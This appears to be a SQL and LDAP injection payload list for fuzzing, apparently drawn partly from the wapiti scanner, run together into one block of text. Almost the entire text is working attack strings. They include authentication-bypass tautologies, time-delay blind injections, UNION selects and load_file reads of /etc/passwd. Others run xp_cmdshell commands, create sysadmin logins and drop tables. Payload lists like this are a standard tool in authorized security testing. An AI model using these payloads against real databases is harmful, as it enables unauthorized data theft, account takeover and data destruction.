1;(load_file(char(47,101,116,99,47,112,97,115,115,119,100))),1,1,1; 1 or 1=1 1;SELECT%20* 1 waitfor delay '0:0:10'-- '%20or%20''=' '%20or%201=1 ')%20or%20('x'='x '%20or%20'x'='x %20or%20x=x %20'sleep%2050' %20$(sleep%2050) %21 23 OR 1=1 %26 %27%20or%201=1 %28 %29 %2A%28%7C%28mail%3D%2A%29%29 %2A%28%7C%28objectclass%3D%2A%29%29 %2A%7C ||6 '||'6 (||6) %7C a' admin' or ' ' and 1=( if((load_file(char(110,46,101,120,116))<>char(39,39)),1,0)); ' and 1 in (select var from temp)-- anything' OR 'x'='x "a"" or 1=1--" a' or 1=1-- "a"" or 3=3--" a' or 3=3-- a' or 'a' = 'a '%20OR as asc a' waitfor delay '0:0:10'-- '; begin declare @var varchar(8000) set @var=':' select @var=@var+'+login+'/'+password+' ' from users where login > bfilename char%4039%41%2b%40SELECT declare @q nvarchar (200) 0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q) declare @q nvarchar (200) select @q = 0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A0031003000270000 exec(@q) declare @q nvarchar (4000) select @q = declare @s varchar (200) select @s = 0x73656c65637420404076657273696f6e exec(@s) declare @s varchar(200) select @s = 0x77616974666F722064656C61792027303A303A31302700 exec(@s) declare @s varchar(22) select @s = declare @s varchar (8000) select @s = 0x73656c65637420404076657273696f6e delete desc distinct '||(elt(-3+5,bin(15),ord(10),hex(char(45)))) '; exec master..xp_cmdshell '; exec master..xp_cmdshell 'ping 172.10.1.255'-- exec(@s) '; exec ('sel' + 'ect us' + 'er') exec sp '; execute immediate 'sel' || 'ect us' || 'er' exec xp '; exec xp_regread ' group by userid having 1=1-- handler having ' having 1=1-- hi or 1=1 --" hi' or 1=1 -- "hi"") or (""a""=""a" hi or a=a hi' or 'a'='a hi') or ('a'='a 'hi' or 'x'='x'; insert like limit *(|(mail=*)) *(|(objectclass=*)) or ' or ''=' or 0=0 #" ' or 0=0 -- ' or 0=0 # " or 0=0 -- or 0=0 -- or 0=0 # ' or 1 --' ' or 1/* ; or '1'='1' ' or '1'='1 ' or '1'='1'-- ' or 1=1 ' or 1=1 /* ' or 1=1-- ' or 1=1-- '/**/or/**/1/**/=/**/1 ‘ or 1=1 -- " or 1=1-- or 1=1 or 1=1-- or 1=1 or ""= ' or 1=1 or ''=' ' or 1 in (select @@version)-- or%201=1 or%201=1 -- ' or 2 > 1 ' or 2 between 1 and 3 ' or 3=3 ‘ or 3=3 -- ' or '7659'='7659 or a=a or a = a ' or 'a'='a ' or a=a-- ') or ('a'='a " or "a"="a ) or (a=a order by ' or (EXISTS) or isNULL(1/0) /* " or isNULL(1/0) /* ' or 'something' like 'some%' ' or 'something' = 'some'+'thing' ' or 'text' = n'text' ' or 'text' > 't' ' or uid like '% ' or uname like '% ' or 'unusual' = 'unusual' ' or userid like '% ' or user like '% ' or username like '% ' or username like char(37); ' or 'whatever' in ('whatever') ' -- &password= password:*/=1-- PRINT PRINT @@variable procedure replace select ' select * from information_schema.tables-- ' select name from syscolumns where id = (select id from sysobjects where name = tablename')-- ' (select top 1 --sp_password 'sqlattempt1 (sqlattempt2) 'sqlvuln '+sqlvuln (sqlvuln) sqlvuln; t'exec master..xp_cmdshell 'nslookup www.google.com'-- to_timestamp_tz truncate tz_offset ' UNION ALL SELECT ' union all select @@version-- ' union select uni/**/on sel/**/ect ' UNION SELECT ' union select 1,load_file('/etc/passwd'),1,1,1; ) union select * from information_schema.tables; ' union select * from users where login = char(114,111,111,116); update '||UTL_HTTP.REQUEST ,@variable @variable @var select @var as var into temp end -- \x27UNION SELECT x' AND 1=(SELECT COUNT(*) FROM tabname); -- x' AND email IS NULL; -- x' AND members.email IS NULL; -- x' AND userid IS NULL; -- x' or 1=1 or 'x'='y x' OR full_name LIKE '%Bob% ý or 1=1 -- # ms-sqli info disclosure payload fuzzfile # replace regex with your fuzzer for best results # run wireshark or tcpdump, look for incoming smb or icmp packets from victim # might need to terminate payloads with ;-- select @@version select @@servernamee select @@microsoftversione select * from master..sysserverse select * from sysusers exec master..xp_cmdshell 'ipconfig+/all' exec master..xp_cmdshell 'net+view' exec master..xp_cmdshell 'net+users' exec master..xp_cmdshell 'ping+' BACKUP database master to disks='\\\\backupdb.dat' create table myfile (line varchar(8000))" bulk insert foo from 'c:\inetpub\wwwroot\auth.aspâ'" select * from myfile"-- # you will need to customize/modify some of the vaules in the queries for best effect '; exec master..xp_cmdshell 'ping 10.10.1.2'-- 'create user name identified by 'pass123' -- 'create user name identified by pass123 temporary tablespace temp default tablespace users; ' ; drop table temp -- 'exec sp_addlogin 'name' , 'password' -- ' exec sp_addsrvrolemember 'name' , 'sysadmin' -- ' insert into mysql.user (user, host, password) values ('name', 'localhost', password('pass123')) -- ' grant connect to name; grant resource to name; -- ' insert into users(login, password, level) values( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72),char(0x64) ' or 1=1 -- ' union (select @@version) -- ' union (select NULL, (select @@version)) -- ' union (select NULL, NULL, (select @@version)) -- ' union (select NULL, NULL, NULL, (select @@version)) -- ' union (select NULL, NULL, NULL, NULL, (select @@version)) -- ' union (select NULL, NULL, NULL, NULL, NULL, (select @@version)) -- 1'1 1 exec sp_ (or exec xp_) 1 and 1=1 1' and 1=(select count(*) from tablenames); -- 1 or 1=1 1' or '1'='1 )%20or%20('x'='x %20or%201=1 ; execute immediate 'sel' || 'ect us' || 'er' benchmark(10000000,MD5(1))# update ";waitfor delay '0:0:__TIME__'-- 1) or pg_sleep(__TIME__)-- ||(elt(-3+5,bin(15),ord(10),hex(char(45)))) "hi"") or (""a""=""a" delete like " or sleep(__TIME__)# pg_sleep(__TIME__)-- *(|(objectclass=*)) declare @q nvarchar (200) 0x730065006c00650063 ... or 0=0 # insert 1) or sleep(__TIME__)# ) or ('a'='a ; exec xp_regread *| @var select @var as var into temp end -- 1)) or benchmark(10000000,MD5(1))# asc (||6) "a"" or 3=3--" " or benchmark(10000000,MD5(1))# # from wapiti or 0=0 -- 1 waitfor delay '0:0:10'-- or 'a'='a hi or 1=1 --" or a = a UNION ALL SELECT ) or sleep(__TIME__)=' )) or benchmark(10000000,MD5(1))# hi' or 'a'='a 0 21 % limit or 1=1 or 2 > 1 ")) or benchmark(10000000,MD5(1))# PRINT hi') or ('a'='a or 3=3 ));waitfor delay '0:0:__TIME__'-- a' waitfor delay '0:0:10'-- 1;(load_file(char(47,101,116,99,47,112,97,115, ... or%201=1 1 or sleep(__TIME__)# or 1=1 and 1 in (select var from temp)-- or '7659'='7659 or 'text' = n'text' -- or 1=1 or ''=' declare @s varchar (200) select @s = 0x73656c6 ... exec xp ; exec master..xp_cmdshell 'ping 172.10.1.255'-- 3.10E+17 " or pg_sleep(__TIME__)-- x' AND email IS NULL; -- & admin' or ' or 'unusual' = 'unusual' // truncate 1) or benchmark(10000000,MD5(1))# \x27UNION SELECT declare @s varchar(200) select @s = 0x77616974 ... tz_offset sqlvuln "));waitfor delay '0:0:__TIME__'-- ||6 or%201=1 -- %2A%28%7C%28objectclass%3D%2A%29%29 or a=a ) union select * from information_schema.tables; PRINT @@variable or isNULL(1/0) /* 26 % " or "a"="a (sqlvuln) x' AND members.email IS NULL; -- or 1=1-- and 1=( if((load_file(char(110,46,101,120,11 ... 0x770061006900740066006F0072002000640065006C00 ... %20'sleep%2050' as 1)) or pg_sleep(__TIME__)-- /**/or/**/1/**/=/**/1 union all select @@version-- ,@variable (sqlattempt2) or (EXISTS) t'exec master..xp_cmdshell 'nslookup www.googl ... %20$(sleep%2050) 1 or benchmark(10000000,MD5(1))# %20or%20''=' ||UTL_HTTP.REQUEST or pg_sleep(__TIME__)-- hi' or 'x'='x'; ") or sleep(__TIME__)=" or 'whatever' in ('whatever') ; begin declare @var varchar(8000) set @var=' ... union select 1,load_file('/etc/passwd'),1,1,1; 0x77616974666F722064656C61792027303A303A313027 ... exec(@s) ) or pg_sleep(__TIME__)-- union select or sleep(__TIME__)# select * from information_schema.tables-- a' or 1=1-- a' or 'a' = 'a declare @s varchar(22) select @s = or 2 between 1 and 3 or a=a-- or '1'='1 | or sleep(__TIME__)=' or 1 --' or 0=0 #" having a' " or isNULL(1/0) /* declare @s varchar (8000) select @s = 0x73656c ... â or 1=1 -- char%4039%41%2b%40SELECT order by bfilename having 1=1-- ) or benchmark(10000000,MD5(1))# or username like char(37); ;waitfor delay '0:0:__TIME__'-- " or 1=1-- x' AND userid IS NULL; -- */* or 'text' > 't' (select top 1 or benchmark(10000000,MD5(1))# ");waitfor delay '0:0:__TIME__'-- a' or 3=3-- -- &password= group by userid having 1=1-- or ''=' ; exec master..xp_cmdshell %20or%20x=x select ")) or sleep(__TIME__)=" 0x730065006c0065006300740020004000400076006500 ... hi' or 1=1 -- ") or pg_sleep(__TIME__)-- %20or%20'x'='x or 'something' = 'some'+'thing' exec sp 29 % ( Ã½ or 1=1 -- 1 or pg_sleep(__TIME__)-- 0 or 1=1 ) or (a=a uni/**/on sel/**/ect replace %27%20or%201=1 )) or pg_sleep(__TIME__)-- %7C x' AND 1=(SELECT COUNT(*) FROM tabname); -- '%20OR ; or '1'='1' declare @q nvarchar (200) select @q = 0x770061 ... 1 or 1=1 ; exec ('sel' + 'ect us' + 'er') 23 OR 1=1 / anything' OR 'x'='x declare @q nvarchar (4000) select @q = or 0=0 -- desc ||'6 ) 1)) or sleep(__TIME__)# or 0=0 # select name from syscolumns where id = (sele ... hi or a=a *(|(mail=*)) password:*/=1-- distinct );waitfor delay '0:0:__TIME__'-- to_timestamp_tz ") or benchmark(10000000,MD5(1))# UNION SELECT %2A%28%7C%28mail%3D%2A%29%29 +sqlvuln or 1=1 /* )) or sleep(__TIME__)=' or 1=1 or ""= or 1 in (select @@version)-- sqlvuln; union select * from users where login = char ... x' or 1=1 or 'x'='y 28 % â or 3=3 -- @variable or '1'='1'-- "a"" or 1=1--" //* %2A%7C " or 0=0 -- ")) or pg_sleep(__TIME__)-- ? or 1/* ! ' or a = a declare @q nvarchar (200) select @q = 0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A0031003000270000 exec(@q) declare @s varchar(200) select @s = 0x77616974666F722064656C61792027303A303A31302700 exec(@s) declare @q nvarchar (200) 0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q) declare @s varchar (200) select @s = 0x73656c65637420404076657273696f6e exec(@s) ' or 1=1 or 1=1 -- x' OR full_name LIKE '%Bob% '; exec master..xp_cmdshell 'ping 172.10.1.255'-- '%20or%20''=' '%20or%20'x'='x ')%20or%20('x'='x ' or 0=0 -- ' or 0=0 # or 0=0 #" ' or 1=1-- ' or '1'='1'-- ' or 1 --' or 1=1-- ' or 1=1 or ''=' or 1=1 or ""= ' or a=a-- or a=a ') or ('a'='a 'hi' or 'x'='x'; or procedure handler ' or username like '% ' or uname like '% ' or userid like '% ' or uid like '% ' or user like '% '; exec master..xp_cmdshell '; exec xp_regread t'exec master..xp_cmdshell 'nslookup www.google.com'-- --sp_password ' UNION SELECT ' UNION ALL SELECT ' or (EXISTS) ' (select top 1 '||UTL_HTTP.REQUEST 1;SELECT%20* <>"'%;)(&+ '%20or%201=1 'sqlattempt1 %28 %29 %26 %21 ' or ''=' ' or 3=3 or 3=3 --